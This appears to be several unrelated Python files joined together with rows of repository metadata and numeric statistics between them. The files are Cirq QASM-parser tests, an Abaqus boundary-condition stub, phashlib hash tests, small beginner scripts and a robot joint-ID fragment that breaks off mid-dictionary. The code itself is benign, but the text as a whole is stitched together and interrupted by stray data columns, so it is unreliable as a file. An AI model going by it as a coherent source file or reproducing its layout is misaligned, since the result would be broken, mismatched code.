def test_id_gate():
    """'id' applied to a register becomes an identity on each of its qubits."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
id q;
"""
    expected_circuit = Circuit()
    for qubit_name in ('q_0', 'q_1'):
        expected_circuit.append(
            cirq.IdentityGate(num_qubits=1)(cirq.NamedQubit(qubit_name)))
    parsed_qasm = QasmParser().parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q': 2}
def test_u3_gate():
    """u3 behaves like the builtin U gate: angles stored in half-turns."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
u3(pi, 2.3, 3) q[0];
u3(+3.14, -pi, (8)) q;
"""
    parser = QasmParser()
    q0 = cirq.NamedQubit('q_0')
    q1 = cirq.NamedQubit('q_1')
    expected_circuit = Circuit()
    expected_circuit.append(
        cirq.Moment([
            QasmUGate(1.0, 2.3 / np.pi, 3 / np.pi)(q0),
            QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q1),
        ]))
    expected_circuit.append(
        cirq.Moment([QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q0)]))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q': 2}
@pytest.mark.parametrize('qasm_gate', [
    'id',
    'u2',
    'u3',
] + [g[0] for g in rotation_gates] + [g[0] for g in single_qubit_gates])
def test_standard_single_qubit_gates_wrong_number_of_args(qasm_gate):
    """Any standard single-qubit gate applied to two qubits is rejected."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[0], q[1];
""".format(qasm_gate)
    with pytest.raises(QasmException, match=r".* takes 1.*got.*2.*line 5"):
        QasmParser().parse(qasm)
@pytest.mark.parametrize(['qasm_gate', 'num_params'], [
    ['id', 0],
    ['u2', 2],
    ['u3', 3],
    ['rx', 1],
    ['ry', 1],
    ['rz', 1],
] + [[g[0], 0] for g in single_qubit_gates])
def test_standard_gates_wrong_params_error(qasm_gate: str, num_params: int):
    """Gates reject both too many parameters and (if they take any) zero."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{}(pi, 2*pi, 3*pi, 4*pi, 5*pi) q[1];
""".format(qasm_gate)
    parser = QasmParser()
    with pytest.raises(QasmException,
                       match=r".*{}.* takes {}.*got.*5.*line 4".format(
                           qasm_gate, num_params)):
        parser.parse(qasm)
    # Zero-parameter gates have no "missing parameters" case to check.
    if num_params == 0: return
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[1];
""".format(qasm_gate)
    parser = QasmParser()
    with pytest.raises(QasmException,
                       match=r".*{}.* takes {}.*got.*0.*line 4".format(
                           qasm_gate, num_params)):
        parser.parse(qasm)
# (qasm gate name, cirq gate) pairs for the parametrized two-qubit gate tests.
two_qubit_gates = [('cx', cirq.CNOT), ('CX', cirq.CNOT), ('cz', cirq.CZ),
                   ('cy', cirq.ControlledGate(cirq.Y)), ('swap', cirq.SWAP),
                   ('ch', cirq.ControlledGate(cirq.H))]
@pytest.mark.parametrize('qasm_gate,cirq_gate', two_qubit_gates)
def test_two_qubit_gates(qasm_gate: str, cirq_gate: cirq.TwoQubitGate):
    """Two-qubit gates on explicit bits and broadcast over registers."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
qreg q2[2];
{0} q1[0], q1[1];
{0} q1, q2[0];
{0} q2, q1;
""".format(qasm_gate)
    parser = QasmParser()
    q1_0 = cirq.NamedQubit('q1_0')
    q1_1 = cirq.NamedQubit('q1_1')
    q2_0 = cirq.NamedQubit('q2_0')
    q2_1 = cirq.NamedQubit('q2_1')
    expected_circuit = Circuit()
    # CX q1[0], q1[1];
    expected_circuit.append(cirq_gate(q1_0, q1_1))
    # CX q1, q2[0]; -- register/bit mix broadcasts over the register
    expected_circuit.append(cirq_gate(q1_0, q2_0))
    expected_circuit.append(cirq_gate(q1_1, q2_0))
    # CX q2, q1; -- registers pair up element-wise
    expected_circuit.append(cirq_gate(q2_0, q1_0))
    expected_circuit.append(cirq_gate(q2_1, q1_1))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q1': 2, 'q2': 2}
@pytest.mark.parametrize('qasm_gate', [g[0] for g in two_qubit_gates])
def test_two_qubit_gates_not_enough_args(qasm_gate: str):
    """A two-qubit gate applied to a single qubit is rejected."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[0];
""".format(qasm_gate)
    pattern = r".*{}.* takes 2 arg\(s\).*got.*1.*line 5".format(qasm_gate)
    with pytest.raises(QasmException, match=pattern):
        QasmParser().parse(qasm)
@pytest.mark.parametrize('qasm_gate', [g[0] for g in two_qubit_gates])
def test_two_qubit_gates_with_too_much_parameters(qasm_gate: str):
    """Two-qubit gates take no parameters; passing one is rejected."""
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{}(pi) q[0],q[1];
""".format(qasm_gate)
    pattern = r".*{}.* takes 0 parameter\(s\).*got.*1.*line 5".format(qasm_gate)
    with pytest.raises(QasmException, match=pattern):
        QasmParser().parse(qasm)
# (qasm gate name, cirq gate) pairs for the parametrized three-qubit gate tests.
three_qubit_gates = [('ccx', cirq.TOFFOLI), ('cswap', cirq.CSWAP)]
@pytest.mark.parametrize('qasm_gate,cirq_gate', three_qubit_gates)
def test_three_qubit_gates(qasm_gate: str, cirq_gate: cirq.Gate):
    """Three-qubit gates on explicit bits and broadcast over registers.

    Fix: the `cirq_gate` annotation said `cirq.TwoQubitGate`, but TOFFOLI and
    CSWAP are three-qubit gates; `cirq.Gate` is the correct type.
    """
    qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
qreg q2[2];
qreg q3[2];
{0} q1[0], q1[1], q2[0];
{0} q1, q2[0], q3[0];
{0} q1, q2, q3;
""".format(qasm_gate)
    parser = QasmParser()
    q1_0 = cirq.NamedQubit('q1_0')
    q1_1 = cirq.NamedQubit('q1_1')
    q2_0 = cirq.NamedQubit('q2_0')
    q2_1 = cirq.NamedQubit('q2_1')
    q3_0 = cirq.NamedQubit('q3_0')
    q3_1 = cirq.NamedQubit('q3_1')
    expected_circuit = Circuit()
    expected_circuit.append(cirq_gate(q1_0, q1_1, q2_0))
    # Register arguments broadcast element-wise against the single bits.
    expected_circuit.append(cirq_gate(q1_0, q2_0, q3_0))
    expected_circuit.append(cirq_gate(q1_1, q2_0, q3_0))
    expected_circuit.append(cirq_gate(q1_0, q2_0, q3_0))
    expected_circuit.append(cirq_gate(q1_1, q2_1, q3_1))
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q1': 2, 'q2': 2, 'q3': 2}
@pytest.mark.parametrize('qasm_gate', [g[0] for g in three_qubit_gates])
def test_three_qubit_gates_not_enough_args(qasm_gate: str):
    """A three-qubit gate applied to a single qubit is rejected."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[0];
""".format(qasm_gate)
    pattern = r""".*{}.* takes 3 arg\(s\).*got.*1.*line 4""".format(qasm_gate)
    with pytest.raises(QasmException, match=pattern):
        QasmParser().parse(qasm)
@pytest.mark.parametrize('qasm_gate', [g[0] for g in three_qubit_gates])
def test_three_qubit_gates_with_too_much_parameters(qasm_gate: str):
    """Three-qubit gates take no parameters; passing one is rejected."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[3];
{}(pi) q[0],q[1],q[2];
""".format(qasm_gate)
    pattern = r""".*{}.*parameter.*line 4.*""".format(qasm_gate)
    with pytest.raises(QasmException, match=pattern):
        QasmParser().parse(qasm)
@pytest.mark.parametrize('qasm_gate,cirq_gate', single_qubit_gates)
def test_single_qubit_gates(qasm_gate: str, cirq_gate: cirq.SingleQubitGate):
    """A single-qubit gate on one bit and broadcast over a register."""
    qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{0} q[0];
{0} q;
""".format(qasm_gate)
    parser = QasmParser()
    q0 = cirq.NamedQubit('q_0')
    q1 = cirq.NamedQubit('q_1')
    # q_0 receives the gate twice (explicit bit + broadcast), q_1 once.
    expected_circuit = Circuit([
        cirq_gate.on(q0),
        cirq_gate.on(q0),
        cirq_gate.on(q1),
    ])
    parsed_qasm = parser.parse(qasm)
    assert parsed_qasm.supportedFormat
    assert parsed_qasm.qelib1Include
    ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
    assert parsed_qasm.qregs == {'q': 2}
| 25.66318
| 80
| 0.5869
| 3,246
| 24,534
| 4.258164
| 0.077018
| 0.061496
| 0.035451
| 0.044567
| 0.827594
| 0.795977
| 0.780133
| 0.74215
| 0.664593
| 0.621762
| 0
| 0.050019
| 0.263349
| 24,534
| 955
| 81
| 25.690052
| 0.714768
| 0.021277
| 0
| 0.632857
| 0
| 0.001429
| 0.257874
| 0.011553
| 0
| 0
| 0
| 0
| 0.098571
| 1
| 0.067143
| false
| 0
| 0.012857
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a7291c2640a59d12a9c9e2e175d9401aa18146c
| 7,687
|
py
|
Python
|
src/abaqus/BoundaryCondition/PorePressureBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/BoundaryCondition/PorePressureBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/BoundaryCondition/PorePressureBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
import typing
from abaqusConstants import *
from .BoundaryCondition import BoundaryCondition
from ..Region.Region import Region
class PorePressureBC(BoundaryCondition):
    """The PorePressureBC object stores the data for a pore pressure boundary condition.
    The PorePressureBC object is derived from the BoundaryCondition object.

    Attributes
    ----------
    name: str
        A String specifying the boundary condition repository key.
    distributionType: SymbolicConstant
        A SymbolicConstant specifying how the boundary condition is distributed spatially.
        Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
    fieldName: str
        A String specifying the name of the :py:class:`~abaqus.Field.AnalyticalField.AnalyticalField` object associated with this boundary
        condition. The **fieldName** argument applies only when **distributionType=FIELD**. The
        default value is an empty string.
    category: SymbolicConstant
        A SymbolicConstant specifying the category of the boundary condition. Possible values
        are MECHANICAL and THERMAL.
    region: Region
        A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the boundary condition is applied.
    localCsys: str
        None or a :py:class:`~abaqus.Datum.DatumCsys.DatumCsys` object specifying the local coordinate system of the boundary
        condition's degrees of freedom. If **localCsys=None**, the degrees of freedom are defined
        in the global coordinate system. The default value is None.

    Notes
    -----
    This object can be accessed by:

    .. code-block:: python

        import load
        mdb.models[name].boundaryConditions[name]
    """

    # A String specifying the boundary condition repository key.
    name: str = ''

    # A SymbolicConstant specifying how the boundary condition is distributed spatially.
    # Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
    distributionType: SymbolicConstant = UNIFORM

    # A String specifying the name of the AnalyticalField object associated with this boundary
    # condition. The *fieldName* argument applies only when *distributionType*=FIELD. The
    # default value is an empty string.
    fieldName: str = ''

    # A SymbolicConstant specifying the category of the boundary condition. Possible values
    # are MECHANICAL and THERMAL. Annotated Optional because the default is None.
    category: typing.Optional[SymbolicConstant] = None

    # A Region object specifying the region to which the boundary condition is applied.
    region: Region = Region()

    # None or a DatumCsys object specifying the local coordinate system of the boundary
    # condition's degrees of freedom. If *localCsys*=None, the degrees of freedom are defined
    # in the global coordinate system. The default value is None.
    # Annotated Optional because the default is None.
    localCsys: typing.Optional[str] = None

    def __init__(self, name: str, createStepName: str, region: Region, fieldName: str = '',
                 magnitude: float = 0, distributionType: SymbolicConstant = UNIFORM,
                 amplitude: str = UNSET, fixed: Boolean = OFF):
        """This method creates a PorePressureBC object.

        Notes
        -----
        This function can be accessed by:

        .. code-block:: python

            mdb.models[name].PorePressureBC

        Parameters
        ----------
        name
            A String specifying the boundary condition repository key.
        createStepName
            A String specifying the name of the step in which the boundary condition is created.
        region
            A Region object specifying the region to which the boundary condition is applied.
        fieldName
            A String specifying the name of the AnalyticalField object associated with this boundary
            condition. The *fieldName* argument applies only when *distributionType*=FIELD. The
            default value is an empty string.
        magnitude
            A Float specifying the pore pressure magnitude. The default value is 0. The *magnitude*
            argument is optional if *distributionType*=USER_DEFINED.
        distributionType
            A SymbolicConstant specifying how the boundary condition is distributed spatially.
            Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
        amplitude
            A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
            UNSET should be used if the boundary condition has no amplitude reference. The default
            value is UNSET. You should provide the *amplitude* argument only if it is valid for the
            specified step.
        fixed
            A Boolean specifying whether the boundary condition should remain fixed at the current
            values at the start of the step. The default value is OFF.

        Returns
        -------
        A PorePressureBC object.
        """
        super().__init__()
        pass  # implementation provided by the Abaqus kernel; this is a type stub

    def setValues(self, fieldName: str = '', magnitude: float = 0, distributionType: SymbolicConstant = UNIFORM,
                  amplitude: str = UNSET, fixed: Boolean = OFF):
        """This method modifies the data for an existing PorePressureBC object in the step where it
        is created.

        Parameters
        ----------
        fieldName
            A String specifying the name of the AnalyticalField object associated with this boundary
            condition. The *fieldName* argument applies only when *distributionType*=FIELD. The
            default value is an empty string.
        magnitude
            A Float specifying the pore pressure magnitude. The default value is 0. The *magnitude*
            argument is optional if *distributionType*=USER_DEFINED.
        distributionType
            A SymbolicConstant specifying how the boundary condition is distributed spatially.
            Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
        amplitude
            A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
            UNSET should be used if the boundary condition has no amplitude reference. The default
            value is UNSET. You should provide the *amplitude* argument only if it is valid for the
            specified step.
        fixed
            A Boolean specifying whether the boundary condition should remain fixed at the current
            values at the start of the step. The default value is OFF.
        """
        pass  # implementation provided by the Abaqus kernel; this is a type stub

    def setValuesInStep(self, stepName: str,
                        magnitude: typing.Union[SymbolicConstant, float] = UNCHANGED,
                        amplitude: str = ''):
        """This method modifies the propagating data for an existing PorePressureBC object in the
        specified step.

        Parameters
        ----------
        stepName
            A String specifying the name of the step in which the boundary condition is modified.
        magnitude
            A Float or the SymbolicConstant FREED specifying the pore pressure magnitude.
        amplitude
            A String or a SymbolicConstant specifying the name of the amplitude reference. Possible
            values for the SymbolicConstant are UNCHANGED and FREED. UNCHANGED should be used if the
            amplitude is propagated from the previous analysis step. FREED should be used if the
            boundary condition is changed to have no amplitude reference. You should provide the
            *amplitude* argument only if it is valid for the specified step.
        """
        pass  # implementation provided by the Abaqus kernel; this is a type stub
| 47.159509
| 138
| 0.674906
| 895
| 7,687
| 5.781006
| 0.157542
| 0.085427
| 0.081175
| 0.052571
| 0.746424
| 0.735408
| 0.735408
| 0.703904
| 0.678005
| 0.657132
| 0
| 0.000719
| 0.276441
| 7,687
| 162
| 139
| 47.450617
| 0.929522
| 0.757643
| 0
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0.130435
| 0.173913
| 0
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
8a9610e1f482f863fe539251393fd992e51dfac4
| 9,246
|
py
|
Python
|
Tests/Test_HashFile.py
|
fake-name/phashlib
|
80acf8a8358452952782c120f063f767bf703196
|
[
"BSD-2-Clause"
] | null | null | null |
Tests/Test_HashFile.py
|
fake-name/phashlib
|
80acf8a8358452952782c120f063f767bf703196
|
[
"BSD-2-Clause"
] | null | null | null |
Tests/Test_HashFile.py
|
fake-name/phashlib
|
80acf8a8358452952782c120f063f767bf703196
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
import phashlib
import os.path
# Unit testing driven by lolcat images
# AS GOD INTENDED!
class TestSequenceFunctions(unittest.TestCase):
    """Regression tests for phashlib.hashFile() / getMd5Hash().

    Unit testing driven by lolcat images — AS GOD INTENDED!

    Fix: 'test_hashImage6' was defined twice; the second definition silently
    shadowed the first, so the shouldPhash=False case never ran. The second
    definition is renamed to test_hashImage6_b. The repeated read/hash/assert
    boilerplate is also factored into helpers.
    """

    def _read_image(self, img_fname):
        """Return the raw bytes of ./testimages/<img_fname> (next to this file)."""
        cwd = os.path.dirname(os.path.realpath(__file__))
        im_path = os.path.join(cwd, 'testimages', img_fname)
        with open(im_path, "rb") as fp:
            return fp.read()

    def _check_hash(self, img_fname, int_name, expect, should_phash=True):
        """Hash the named test image and assert hashFile()'s five return values.

        *expect* maps 'hexHash', 'pHash', 'imX', 'imY' to the expected values.
        shouldPhash is only passed explicitly when False, to preserve the
        original calls' behavior exactly.
        """
        f_cont = self._read_image(img_fname)
        if should_phash:
            result = phashlib.hashFile("LOL", int_name, f_cont)
        else:
            result = phashlib.hashFile("LOL", int_name, f_cont,
                                       shouldPhash=False)
        fname, hex_hash, p_hash, im_x, im_y = result
        self.assertEqual(int_name, fname)
        self.assertEqual(hex_hash, expect['hexHash'])
        self.assertEqual(p_hash, expect['pHash'])
        self.assertEqual(im_x, expect['imX'])
        self.assertEqual(im_y, expect['imY'])

    def test_hashImage1(self):
        self._check_hash(
            'dangerous-to-go-alone.jpg', "WAT.jpg",
            {'hexHash': "dcd6097eeac911efed3124374f44085b",
             'pHash': -149413575039568585, 'imX': 325, 'imY': 307})

    def test_hashImage2(self):
        self._check_hash(
            'Lolcat_this_is_mah_job.jpg', "WAT.jpg",
            {'hexHash': "d9ceeb6b43c2d7d096532eabfa6cf482",
             'pHash': 27427800275512429, 'imX': 493, 'imY': 389})

    def test_hashImage2_b(self):
        # check that phash is invariant across format changes
        self._check_hash(
            'Lolcat_this_is_mah_job.png', "WAT.jpg",
            {'hexHash': "1268e704908cc39299d73d6caafc23a0",
             'pHash': 27427800275512429, 'imX': 493, 'imY': 389})

    def test_hashImage2_c(self):
        # check that phash is invariant across size changes
        self._check_hash(
            'Lolcat_this_is_mah_job_small.jpg', "WAT.jpg",
            {'hexHash': "40d39c436e14282dcda06e8aff367307",
             'pHash': 27427800275512429, 'imX': 300, 'imY': 237})

    def test_hashImage3(self):
        self._check_hash(
            'lolcat-crocs.jpg', "WAT.jpg",
            {'hexHash': "6d0a977694630ac9d1d33a7f068e10f8",
             'pHash': -5569898607211671279, 'imX': 500, 'imY': 363})

    def test_hashImage4(self):
        self._check_hash(
            'lolcat-oregon-trail.jpg', "WAT.jpg",
            {'hexHash': "7227289a017988b6bdcf61fd4761f6b9",
             'pHash': -4955310669995365332, 'imX': 501, 'imY': 356})

    def test_hashImage5(self):
        # intName without an image extension: no phash/dimensions are computed.
        self._check_hash(
            'lolcat-oregon-trail.jpg', "WAT",
            {'hexHash': "7227289a017988b6bdcf61fd4761f6b9",
             'pHash': None, 'imX': None, 'imY': None})

    def test_hashImage6(self):
        # shouldPhash=False: only the md5 is computed.
        self._check_hash(
            'lolcat-oregon-trail.jpg', "WAT.jpg",
            {'hexHash': "7227289a017988b6bdcf61fd4761f6b9",
             'pHash': None, 'imX': None, 'imY': None},
            should_phash=False)

    def test_hashFile(self):
        f_cont = self._read_image('lolcat-oregon-trail.jpg')
        hex_hash = phashlib.getMd5Hash(f_cont)
        self.assertEqual(hex_hash, "7227289a017988b6bdcf61fd4761f6b9")

    def test_hashImage6_b(self):
        # Renamed from a duplicate 'test_hashImage6' that shadowed the first.
        self._check_hash(
            'e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
            'e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
            {'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
             'pHash': -4230769653536099758, 'imX': 375, 'imY': 281})

    def test_hashImage7(self):
        self._check_hash(
            'funny-pictures-cat-looks-like-an-owl-ps.png',
            'funny-pictures-cat-looks-like-an-owl-ps.png',
            {'hexHash': '740555f4e730ab2c6c261be7d53a3156',
             'pHash': -93277392328150, 'imX': 369, 'imY': 332})

    def test_hashImage8(self):
        self._check_hash(
            'funny-pictures-cat-will-do-science-ps.png',
            'funny-pictures-cat-will-do-science-ps.png',
            {'hexHash': 'c47ed1cd79c4e7925b8015cb51bbab10',
             'pHash': -6361731780925024615, 'imX': 375, 'imY': 506})

    def test_hashImage9(self):
        self._check_hash(
            'funny-pictures-kitten-rules-a-tower-ps.png',
            'funny-pictures-kitten-rules-a-tower-ps.png',
            {'hexHash': 'fb64248009dde8605a95b041b772544a',
             'pHash': -5860684349360469885, 'imX': 375, 'imY': 281})

    def test_hashImage10(self):
        self._check_hash(
            'superheroes-batman-superman-i-would-watch-the-hell-out-of-this.jpg',
            'superheroes-batman-superman-i-would-watch-the-hell-out-of-this.jpg',
            {'hexHash': '083e179ff11ccf90a0d514651c69c2ca',
             'pHash': -8034280126218048380, 'imX': 200, 'imY': 297})
| 27.436202
| 98
| 0.673372
| 1,089
| 9,246
| 5.631772
| 0.150597
| 0.161422
| 0.020545
| 0.029676
| 0.760313
| 0.754443
| 0.743193
| 0.734225
| 0.734225
| 0.734225
| 0
| 0.088601
| 0.182133
| 9,246
| 336
| 99
| 27.517857
| 0.722428
| 0.029851
| 0
| 0.635193
| 0
| 0.004292
| 0.156808
| 0.098661
| 0
| 0
| 0
| 0
| 0.283262
| 1
| 0.064378
| false
| 0
| 0.012876
| 0
| 0.081545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a99e2ad978a63743a44abf83e674c334c36a2a0
| 145
|
py
|
Python
|
basics/dict.py
|
bobbybabra/codeGuild
|
0b49dbb6a0f113e1179e28fd36d59e7c327c7d31
|
[
"BSD-2-Clause"
] | null | null | null |
basics/dict.py
|
bobbybabra/codeGuild
|
0b49dbb6a0f113e1179e28fd36d59e7c327c7d31
|
[
"BSD-2-Clause"
] | null | null | null |
basics/dict.py
|
bobbybabra/codeGuild
|
0b49dbb6a0f113e1179e28fd36d59e7c327c7d31
|
[
"BSD-2-Clause"
] | null | null | null |
dictionary = {'name': 'chris'}
print dictionary['name']
dictionary['age'] = 31
print dictionary
# dictionaries are mutable #
#changing a line
| 14.5
| 30
| 0.710345
| 17
| 145
| 6.058824
| 0.705882
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01626
| 0.151724
| 145
| 9
| 31
| 16.111111
| 0.821138
| 0.275862
| 0
| 0
| 0
| 0
| 0.158416
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
76d4e21a672c3573785881b7083be7bfa2556c38
| 288
|
py
|
Python
|
python/exercicios mundo 1/ex006/ex002.py
|
LEXW3B/PYTHON
|
1ae54ea709c008bd7fab7602e034773610e7985e
|
[
"MIT"
] | 1
|
2022-01-05T08:51:16.000Z
|
2022-01-05T08:51:16.000Z
|
python/exercicios mundo 1/ex006/ex002.py
|
LEXW3B/PYTHON
|
1ae54ea709c008bd7fab7602e034773610e7985e
|
[
"MIT"
] | null | null | null |
python/exercicios mundo 1/ex006/ex002.py
|
LEXW3B/PYTHON
|
1ae54ea709c008bd7fab7602e034773610e7985e
|
[
"MIT"
] | null | null | null |
n1 = float(input('digite sua nota: '))
n2 = float(input('digite sua nota: '))
m = (n1 + n2) / 2
if m >=6.0:
print('sua média foi {:.1f}.'.format(m))
print('parabéns você PASSOU!!!')
else:
print('sua média foi {}.'.format(m))
print('REPROVADO! sem férias para você kkkkk')
| 28.8
| 50
| 0.597222
| 45
| 288
| 3.822222
| 0.577778
| 0.116279
| 0.186047
| 0.22093
| 0.267442
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034483
| 0.194444
| 288
| 9
| 51
| 32
| 0.706897
| 0
| 0
| 0
| 0
| 0
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0
| 0
| 0
| 0.444444
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
|
0
| 5
|
76e74ecc5621927b8df8cf4ccb8b8131a1dcd4e6
| 94
|
py
|
Python
|
mmdet3d/ops/furthest_point_sample/__init__.py
|
BOURSa/mmdetection3d
|
27d0001e873b3102a828a27e1372873fcf81ed7e
|
[
"Apache-2.0"
] | 12
|
2021-03-17T09:07:18.000Z
|
2022-01-21T01:37:42.000Z
|
mmdet3d/ops/furthest_point_sample/__init__.py
|
BOURSa/mmdetection3d
|
27d0001e873b3102a828a27e1372873fcf81ed7e
|
[
"Apache-2.0"
] | 1
|
2020-08-11T05:44:29.000Z
|
2020-08-11T05:44:29.000Z
|
mmdet3d/ops/furthest_point_sample/__init__.py
|
BOURSa/mmdetection3d
|
27d0001e873b3102a828a27e1372873fcf81ed7e
|
[
"Apache-2.0"
] | 2
|
2021-03-17T09:25:15.000Z
|
2021-04-22T09:15:58.000Z
|
from .furthest_point_sample import furthest_point_sample
__all__ = ['furthest_point_sample']
| 23.5
| 56
| 0.851064
| 12
| 94
| 5.833333
| 0.5
| 0.557143
| 0.814286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 3
| 57
| 31.333333
| 0.813953
| 0
| 0
| 0
| 0
| 0
| 0.223404
| 0.223404
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
0a09c3547d92d2e45602c69c41e62e403dd59493
| 107
|
py
|
Python
|
former/__init__.py
|
esvhd/former
|
9aca51b8f7a6f2abe2175293b895ed4af468e890
|
[
"MIT"
] | null | null | null |
former/__init__.py
|
esvhd/former
|
9aca51b8f7a6f2abe2175293b895ed4af468e890
|
[
"MIT"
] | null | null | null |
former/__init__.py
|
esvhd/former
|
9aca51b8f7a6f2abe2175293b895ed4af468e890
|
[
"MIT"
] | null | null | null |
from .modules import SelfAttention, TransformerBlock
from .transformers import GTransformer, CTransformer
| 26.75
| 52
| 0.859813
| 10
| 107
| 9.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102804
| 107
| 3
| 53
| 35.666667
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
0a1e15ae13ef8c1b7e443d813d6aa06089106646
| 13,739
|
py
|
Python
|
python/dynamic_graph/sot/torque_control/identification/identification_utils.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
python/dynamic_graph/sot/torque_control/identification/identification_utils.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
python/dynamic_graph/sot/torque_control/identification/identification_utils.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
import time
import sys
from subprocess import call
import numpy as np
jID = { "rhy" : 0,
"rhr" : 1,
"rhp" : 2,
"rk" : 3,
"rap" : 4,
"rar" : 5,
"lhy" : 6,
